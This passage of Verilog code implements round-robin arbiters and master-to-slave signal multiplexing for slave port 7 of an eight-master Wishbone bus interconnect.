                    if ( s7_msel_arb2_req[6] ) 
                    begin
                        s7_msel_arb2_next_state = s7_msel_arb2_grant6;
                    end
                    else
                    begin 
                        if ( s7_msel_arb2_req[7] ) 
                        begin
                            s7_msel_arb2_next_state = s7_msel_arb2_grant7;
                        end
                        else
                        begin 
                            if ( s7_msel_arb2_req[0] ) 
                            begin
                                s7_msel_arb2_next_state = s7_msel_arb2_grant0;
                            end
                            else
                            begin 
                                if ( s7_msel_arb2_req[1] ) 
                                begin
                                    s7_msel_arb2_next_state = s7_msel_arb2_grant1;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb2_req[2] ) 
                                    begin
                                        s7_msel_arb2_next_state = s7_msel_arb2_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb2_req[3] ) 
                                        begin
                                            s7_msel_arb2_next_state = s7_msel_arb2_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_msel_arb2_grant5:
        begin
            if (  !( s7_msel_arb2_req[5]) | 1'b0 ) 
            begin
                if ( s7_msel_arb2_req[6] ) 
                begin
                    s7_msel_arb2_next_state = s7_msel_arb2_grant6;
                end
                else
                begin 
                    if ( s7_msel_arb2_req[7] ) 
                    begin
                        s7_msel_arb2_next_state = s7_msel_arb2_grant7;
                    end
                    else
                    begin 
                        if ( s7_msel_arb2_req[0] ) 
                        begin
                            s7_msel_arb2_next_state = s7_msel_arb2_grant0;
                        end
                        else
                        begin 
                            if ( s7_msel_arb2_req[1] ) 
                            begin
                                s7_msel_arb2_next_state = s7_msel_arb2_grant1;
                            end
                            else
                            begin 
                                if ( s7_msel_arb2_req[2] ) 
                                begin
                                    s7_msel_arb2_next_state = s7_msel_arb2_grant2;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb2_req[3] ) 
                                    begin
                                        s7_msel_arb2_next_state = s7_msel_arb2_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb2_req[4] ) 
                                        begin
                                            s7_msel_arb2_next_state = s7_msel_arb2_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_msel_arb2_grant6:
        begin
            if (  !( s7_msel_arb2_req[6]) | 1'b0 ) 
            begin
                if ( s7_msel_arb2_req[7] ) 
                begin
                    s7_msel_arb2_next_state = s7_msel_arb2_grant7;
                end
                else
                begin 
                    if ( s7_msel_arb2_req[0] ) 
                    begin
                        s7_msel_arb2_next_state = s7_msel_arb2_grant0;
                    end
                    else
                    begin 
                        if ( s7_msel_arb2_req[1] ) 
                        begin
                            s7_msel_arb2_next_state = s7_msel_arb2_grant1;
                        end
                        else
                        begin 
                            if ( s7_msel_arb2_req[2] ) 
                            begin
                                s7_msel_arb2_next_state = s7_msel_arb2_grant2;
                            end
                            else
                            begin 
                                if ( s7_msel_arb2_req[3] ) 
                                begin
                                    s7_msel_arb2_next_state = s7_msel_arb2_grant3;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb2_req[4] ) 
                                    begin
                                        s7_msel_arb2_next_state = s7_msel_arb2_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb2_req[5] ) 
                                        begin
                                            s7_msel_arb2_next_state = s7_msel_arb2_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_msel_arb2_grant7:
        begin
            if (  !( s7_msel_arb2_req[7]) | 1'b0 ) 
            begin
                if ( s7_msel_arb2_req[0] ) 
                begin
                    s7_msel_arb2_next_state = s7_msel_arb2_grant0;
                end
                else
                begin 
                    if ( s7_msel_arb2_req[1] ) 
                    begin
                        s7_msel_arb2_next_state = s7_msel_arb2_grant1;
                    end
                    else
                    begin 
                        if ( s7_msel_arb2_req[2] ) 
                        begin
                            s7_msel_arb2_next_state = s7_msel_arb2_grant2;
                        end
                        else
                        begin 
                            if ( s7_msel_arb2_req[3] ) 
                            begin
                                s7_msel_arb2_next_state = s7_msel_arb2_grant3;
                            end
                            else
                            begin 
                                if ( s7_msel_arb2_req[4] ) 
                                begin
                                    s7_msel_arb2_next_state = s7_msel_arb2_grant4;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb2_req[5] ) 
                                    begin
                                        s7_msel_arb2_next_state = s7_msel_arb2_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb2_req[6] ) 
                                        begin
                                            s7_msel_arb2_next_state = s7_msel_arb2_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s7_msel_arb3_req = { ( s7_msel_req[7] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[15] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[14] ) ) } == 2'd3 ) ), ( s7_msel_req[6] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[13] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[12] ) ) } == 2'd3 ) ), ( s7_msel_req[5] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[11] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[10] ) ) } == 2'd3 ) ), ( s7_msel_req[4] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[9] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[8] ) ) } == 2'd3 ) ), ( s7_msel_req[3] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[7] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[6] ) ) } == 2'd3 ) ), ( s7_msel_req[2] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[5] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[4] ) ) } == 2'd3 ) ), ( s7_msel_req[1] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[3] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[2] ) ) } == 2'd3 ) ), ( s7_msel_req[0] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[1] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[0] ) ) } == 2'd3 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s7_msel_arb3_state <= s7_msel_arb3_grant0;
        end
        else
        begin 
            s7_msel_arb3_state <= s7_msel_arb3_next_state;
        end
    end
    always @ (  s7_msel_arb3_state or  { ( s7_msel_req[7] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[15] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[14] ) ) } == 2'd3 ) ), ( s7_msel_req[6] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[13] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[12] ) ) } == 2'd3 ) ), ( s7_msel_req[5] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[11] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[10] ) ) } == 2'd3 ) ), ( s7_msel_req[4] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[9] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[8] ) ) } == 2'd3 ) ), ( s7_msel_req[3] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[7] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[6] ) ) } == 2'd3 ) ), ( s7_msel_req[2] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[5] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[4] ) ) } == 2'd3 ) ), ( s7_msel_req[1] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[3] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[2] ) ) } == 2'd3 ) ), ( s7_msel_req[0] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[1] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[0] ) ) } == 2'd3 ) ) } or  1'b0)
    begin
        s7_msel_arb3_next_state = s7_msel_arb3_state;
        case ( s7_msel_arb3_state ) 
        s7_msel_arb3_grant0:
        begin
            if (  !( s7_msel_arb3_req[0]) | 1'b0 ) 
            begin
                if ( s7_msel_arb3_req[1] ) 
                begin
                    s7_msel_arb3_next_state = s7_msel_arb3_grant1;
                end
                else
                begin 
                    if ( s7_msel_arb3_req[2] ) 
                    begin
                        s7_msel_arb3_next_state = s7_msel_arb3_grant2;
                    end
                    else
                    begin 
                        if ( s7_msel_arb3_req[3] ) 
                        begin
                            s7_msel_arb3_next_state = s7_msel_arb3_grant3;
                        end
                        else
                        begin 
                            if ( s7_msel_arb3_req[4] ) 
                            begin
                                s7_msel_arb3_next_state = s7_msel_arb3_grant4;
                            end
                            else
                            begin 
                                if ( s7_msel_arb3_req[5] ) 
                                begin
                                    s7_msel_arb3_next_state = s7_msel_arb3_grant5;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb3_req[6] ) 
                                    begin
                                        s7_msel_arb3_next_state = s7_msel_arb3_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb3_req[7] ) 
                                        begin
                                            s7_msel_arb3_next_state = s7_msel_arb3_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_msel_arb3_grant1:
        begin
            if (  !( s7_msel_arb3_req[1]) | 1'b0 ) 
            begin
                if ( s7_msel_arb3_req[2] ) 
                begin
                    s7_msel_arb3_next_state = s7_msel_arb3_grant2;
                end
                else
                begin 
                    if ( s7_msel_arb3_req[3] ) 
                    begin
                        s7_msel_arb3_next_state = s7_msel_arb3_grant3;
                    end
                    else
                    begin 
                        if ( s7_msel_arb3_req[4] ) 
                        begin
                            s7_msel_arb3_next_state = s7_msel_arb3_grant4;
                        end
                        else
                        begin 
                            if ( s7_msel_arb3_req[5] ) 
                            begin
                                s7_msel_arb3_next_state = s7_msel_arb3_grant5;
                            end
                            else
                            begin 
                                if ( s7_msel_arb3_req[6] ) 
                                begin
                                    s7_msel_arb3_next_state = s7_msel_arb3_grant6;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb3_req[7] ) 
                                    begin
                                        s7_msel_arb3_next_state = s7_msel_arb3_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb3_req[0] ) 
                                        begin
                                            s7_msel_arb3_next_state = s7_msel_arb3_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_msel_arb3_grant2:
        begin
            if (  !( s7_msel_arb3_req[2]) | 1'b0 ) 
            begin
                if ( s7_msel_arb3_req[3] ) 
                begin
                    s7_msel_arb3_next_state = s7_msel_arb3_grant3;
                end
                else
                begin 
                    if ( s7_msel_arb3_req[4] ) 
                    begin
                        s7_msel_arb3_next_state = s7_msel_arb3_grant4;
                    end
                    else
                    begin 
                        if ( s7_msel_arb3_req[5] ) 
                        begin
                            s7_msel_arb3_next_state = s7_msel_arb3_grant5;
                        end
                        else
                        begin 
                            if ( s7_msel_arb3_req[6] ) 
                            begin
                                s7_msel_arb3_next_state = s7_msel_arb3_grant6;
                            end
                            else
                            begin 
                                if ( s7_msel_arb3_req[7] ) 
                                begin
                                    s7_msel_arb3_next_state = s7_msel_arb3_grant7;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb3_req[0] ) 
                                    begin
                                        s7_msel_arb3_next_state = s7_msel_arb3_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb3_req[1] ) 
                                        begin
                                            s7_msel_arb3_next_state = s7_msel_arb3_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_msel_arb3_grant3:
        begin
            if (  !( s7_msel_arb3_req[3]) | 1'b0 ) 
            begin
                if ( s7_msel_arb3_req[4] ) 
                begin
                    s7_msel_arb3_next_state = s7_msel_arb3_grant4;
                end
                else
                begin 
                    if ( s7_msel_arb3_req[5] ) 
                    begin
                        s7_msel_arb3_next_state = s7_msel_arb3_grant5;
                    end
                    else
                    begin 
                        if ( s7_msel_arb3_req[6] ) 
                        begin
                            s7_msel_arb3_next_state = s7_msel_arb3_grant6;
                        end
                        else
                        begin 
                            if ( s7_msel_arb3_req[7] ) 
                            begin
                                s7_msel_arb3_next_state = s7_msel_arb3_grant7;
                            end
                            else
                            begin 
                                if ( s7_msel_arb3_req[0] ) 
                                begin
                                    s7_msel_arb3_next_state = s7_msel_arb3_grant0;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb3_req[1] ) 
                                    begin
                                        s7_msel_arb3_next_state = s7_msel_arb3_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb3_req[2] ) 
                                        begin
                                            s7_msel_arb3_next_state = s7_msel_arb3_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_msel_arb3_grant4:
        begin
            if (  !( s7_msel_arb3_req[4]) | 1'b0 ) 
            begin
                if ( s7_msel_arb3_req[5] ) 
                begin
                    s7_msel_arb3_next_state = s7_msel_arb3_grant5;
                end
                else
                begin 
                    if ( s7_msel_arb3_req[6] ) 
                    begin
                        s7_msel_arb3_next_state = s7_msel_arb3_grant6;
                    end
                    else
                    begin 
                        if ( s7_msel_arb3_req[7] ) 
                        begin
                            s7_msel_arb3_next_state = s7_msel_arb3_grant7;
                        end
                        else
                        begin 
                            if ( s7_msel_arb3_req[0] ) 
                            begin
                                s7_msel_arb3_next_state = s7_msel_arb3_grant0;
                            end
                            else
                            begin 
                                if ( s7_msel_arb3_req[1] ) 
                                begin
                                    s7_msel_arb3_next_state = s7_msel_arb3_grant1;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb3_req[2] ) 
                                    begin
                                        s7_msel_arb3_next_state = s7_msel_arb3_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb3_req[3] ) 
                                        begin
                                            s7_msel_arb3_next_state = s7_msel_arb3_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_msel_arb3_grant5:
        begin
            if (  !( s7_msel_arb3_req[5]) | 1'b0 ) 
            begin
                if ( s7_msel_arb3_req[6] ) 
                begin
                    s7_msel_arb3_next_state = s7_msel_arb3_grant6;
                end
                else
                begin 
                    if ( s7_msel_arb3_req[7] ) 
                    begin
                        s7_msel_arb3_next_state = s7_msel_arb3_grant7;
                    end
                    else
                    begin 
                        if ( s7_msel_arb3_req[0] ) 
                        begin
                            s7_msel_arb3_next_state = s7_msel_arb3_grant0;
                        end
                        else
                        begin 
                            if ( s7_msel_arb3_req[1] ) 
                            begin
                                s7_msel_arb3_next_state = s7_msel_arb3_grant1;
                            end
                            else
                            begin 
                                if ( s7_msel_arb3_req[2] ) 
                                begin
                                    s7_msel_arb3_next_state = s7_msel_arb3_grant2;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb3_req[3] ) 
                                    begin
                                        s7_msel_arb3_next_state = s7_msel_arb3_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb3_req[4] ) 
                                        begin
                                            s7_msel_arb3_next_state = s7_msel_arb3_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_msel_arb3_grant6:
        begin
            if (  !( s7_msel_arb3_req[6]) | 1'b0 ) 
            begin
                if ( s7_msel_arb3_req[7] ) 
                begin
                    s7_msel_arb3_next_state = s7_msel_arb3_grant7;
                end
                else
                begin 
                    if ( s7_msel_arb3_req[0] ) 
                    begin
                        s7_msel_arb3_next_state = s7_msel_arb3_grant0;
                    end
                    else
                    begin 
                        if ( s7_msel_arb3_req[1] ) 
                        begin
                            s7_msel_arb3_next_state = s7_msel_arb3_grant1;
                        end
                        else
                        begin 
                            if ( s7_msel_arb3_req[2] ) 
                            begin
                                s7_msel_arb3_next_state = s7_msel_arb3_grant2;
                            end
                            else
                            begin 
                                if ( s7_msel_arb3_req[3] ) 
                                begin
                                    s7_msel_arb3_next_state = s7_msel_arb3_grant3;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb3_req[4] ) 
                                    begin
                                        s7_msel_arb3_next_state = s7_msel_arb3_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb3_req[5] ) 
                                        begin
                                            s7_msel_arb3_next_state = s7_msel_arb3_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_msel_arb3_grant7:
        begin
            if (  !( s7_msel_arb3_req[7]) | 1'b0 ) 
            begin
                if ( s7_msel_arb3_req[0] ) 
                begin
                    s7_msel_arb3_next_state = s7_msel_arb3_grant0;
                end
                else
                begin 
                    if ( s7_msel_arb3_req[1] ) 
                    begin
                        s7_msel_arb3_next_state = s7_msel_arb3_grant1;
                    end
                    else
                    begin 
                        if ( s7_msel_arb3_req[2] ) 
                        begin
                            s7_msel_arb3_next_state = s7_msel_arb3_grant2;
                        end
                        else
                        begin 
                            if ( s7_msel_arb3_req[3] ) 
                            begin
                                s7_msel_arb3_next_state = s7_msel_arb3_grant3;
                            end
                            else
                            begin 
                                if ( s7_msel_arb3_req[4] ) 
                                begin
                                    s7_msel_arb3_next_state = s7_msel_arb3_grant4;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb3_req[5] ) 
                                    begin
                                        s7_msel_arb3_next_state = s7_msel_arb3_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb3_req[6] ) 
                                        begin
                                            s7_msel_arb3_next_state = s7_msel_arb3_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    always @ (  s7_msel_pri_out or  s7_msel_arb0_state or  s7_msel_arb1_state)
    begin
        if ( s7_msel_pri_out[0] ) 
        begin
            s7_msel_sel1 = s7_msel_arb1_state;
        end
        else
        begin 
            s7_msel_sel1 = s7_msel_arb0_state;
        end
    end
    always @ (  s7_msel_pri_out or  s7_msel_arb0_state or  s7_msel_arb1_state or  s7_msel_arb2_state or  s7_msel_arb3_state)
    begin
        case ( s7_msel_pri_out ) 
        2'd0:
        begin
            s7_msel_sel2 = s7_msel_arb0_state;
        end
        2'd1:
        begin
            s7_msel_sel2 = s7_msel_arb1_state;
        end
        2'd2:
        begin
            s7_msel_sel2 = s7_msel_arb2_state;
        end
        2'd3:
        begin
            s7_msel_sel2 = s7_msel_arb3_state;
        end
        endcase
    end
    assign s7_mast_sel = ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) );
    always @ (  ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) or  m0_wb_addr_i or  m1_wb_addr_i or  m2_wb_addr_i or  m3_wb_addr_i or  m4_wb_addr_i or  m5_wb_addr_i or  m6_wb_addr_i or  m7_wb_addr_i)
    begin
        case ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s7_wb_addr_o = m0_wb_addr_i;
        end
        3'd1:
        begin
            s7_wb_addr_o = m1_wb_addr_i;
        end
        3'd2:
        begin
            s7_wb_addr_o = m2_wb_addr_i;
        end
        3'd3:
        begin
            s7_wb_addr_o = m3_wb_addr_i;
        end
        3'd4:
        begin
            s7_wb_addr_o = m4_wb_addr_i;
        end
        3'd5:
        begin
            s7_wb_addr_o = m5_wb_addr_i;
        end
        3'd6:
        begin
            s7_wb_addr_o = m6_wb_addr_i;
        end
        3'd7:
        begin
            s7_wb_addr_o = m7_wb_addr_i;
        end
        endcase
    end
    always @ (  ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) or  m0_wb_sel_i or  m1_wb_sel_i or  m2_wb_sel_i or  m3_wb_sel_i or  m4_wb_sel_i or  m5_wb_sel_i or  m6_wb_sel_i or  m7_wb_sel_i)
    begin
        case ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s7_wb_sel_o = m0_wb_sel_i;
        end
        3'd1:
        begin
            s7_wb_sel_o = m1_wb_sel_i;
        end
        3'd2:
        begin
            s7_wb_sel_o = m2_wb_sel_i;
        end
        3'd3:
        begin
            s7_wb_sel_o = m3_wb_sel_i;
        end
        3'd4:
        begin
            s7_wb_sel_o = m4_wb_sel_i;
        end
        3'd5:
        begin
            s7_wb_sel_o = m5_wb_sel_i;
        end
        3'd6:
        begin
            s7_wb_sel_o = m6_wb_sel_i;
        end
        3'd7:
        begin
            s7_wb_sel_o = m7_wb_sel_i;
        end
        endcase
    end
    always @ (  ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) or  m0_wb_data_i or  m1_wb_data_i or  m2_wb_data_i or  m3_wb_data_i or  m4_wb_data_i or  m5_wb_data_i or  m6_wb_data_i or  m7_wb_data_i)
    begin
        case ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s7_wb_data_o = m0_wb_data_i;
        end
        3'd1:
        begin
            s7_wb_data_o = m1_wb_data_i;
        end
        3'd2:
        begin
            s7_wb_data_o = m2_wb_data_i;
        end
        3'd3:
        begin
            s7_wb_data_o = m3_wb_data_i;
        end
        3'd4:
        begin
            s7_wb_data_o = m4_wb_data_i;
        end
        3'd5:
        begin
            s7_wb_data_o = m5_wb_data_i;
        end
        3'd6:
        begin
            s7_wb_data_o = m6_wb_data_i;
        end
        3'd7:
        begin
            s7_wb_data_o = m7_wb_data_i;
        end
        endcase
    end
    assign s7_m0_data_o = s7_data_i;
    assign s7_m1_data_o = s7_data_i;
    assign s7_m2_data_o = s7_data_i;
    assign s7_m3_data_o = s7_data_i;
    assign s7_m4_data_o = s7_data_i;
    assign s7_m5_data_o = s7_data_i;
    assign s7_m6_data_o = s7_data_i;
    assign s7_m7_data_o = s7_data_i;
    always @ (  ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) or  m0_wb_we_i or  m1_wb_we_i or  m2_wb_we_i or  m3_wb_we_i or  m4_wb_we_i or  m5_wb_we_i or  m6_wb_we_i or  m7_wb_we_i)
    begin
        case ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s7_wb_we_o = m0_wb_we_i;
        end
        3'd1:
        begin
            s7_wb_we_o = m1_wb_we_i;
        end
        3'd2:
        begin
            s7_wb_we_o = m2_wb_we_i;
        end
        3'd3:
        begin
            s7_wb_we_o = m3_wb_we_i;
        end
        3'd4:
        begin
            s7_wb_we_o = m4_wb_we_i;
        end
        3'd5:
        begin
            s7_wb_we_o = m5_wb_we_i;
        end
        3'd6:
        begin
            s7_wb_we_o = m6_wb_we_i;
        end
        3'd7:
        begin
            s7_wb_we_o = m7_wb_we_i;
        end
        endcase
    end
    always @ (  posedge clk_i)
    begin
        s7_m0_cyc_r <= m0_s7_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s7_m1_cyc_r <= m1_s7_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s7_m2_cyc_r <= m2_s7_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s7_m3_cyc_r <= m3_s7_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s7_m4_cyc_r <= m4_s7_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s7_m5_cyc_r <= m5_s7_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s7_m6_cyc_r <= m6_s7_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s7_m7_cyc_r <= m7_s7_cyc_o;
    end
    always @ (  ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) or  m0_s7_cyc_o or  m1_s7_cyc_o or  m2_s7_cyc_o or  m3_s7_cyc_o or  m4_s7_cyc_o or  m5_s7_cyc_o or  m6_s7_cyc_o or  m7_s7_cyc_o or  s7_m0_cyc_r or  s7_m1_cyc_r or  s7_m2_cyc_r or  s7_m3_cyc_r or  s7_m4_cyc_r or  s7_m5_cyc_r or  s7_m6_cyc_r or  s7_m7_cyc_r)
    begin
        case ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s7_wb_cyc_o = ( m0_s7_cyc_o & s7_m0_cyc_r );
        end
        3'd1:
        begin
            s7_wb_cyc_o = ( m1_s7_cyc_o & s7_m1_cyc_r );
        end
        3'd2:
        begin
            s7_wb_cyc_o = ( m2_s7_cyc_o & s7_m2_cyc_r );
        end
        3'd3:
        begin
            s7_wb_cyc_o = ( m3_s7_cyc_o & s7_m3_cyc_r );
        end
        3'd4:
        begin
            s7_wb_cyc_o = ( m4_s7_cyc_o & s7_m4_cyc_r );
        end
        3'd5:
        begin
            s7_wb_cyc_o = ( m5_s7_cyc_o & s7_m5_cyc_r );
        end
        3'd6:
        begin
            s7_wb_cyc_o = ( m6_s7_cyc_o & s7_m6_cyc_r );
        end
        3'd7:
        begin
            s7_wb_cyc_o = ( m7_s7_cyc_o & s7_m7_cyc_r );
        end
        endcase
    end
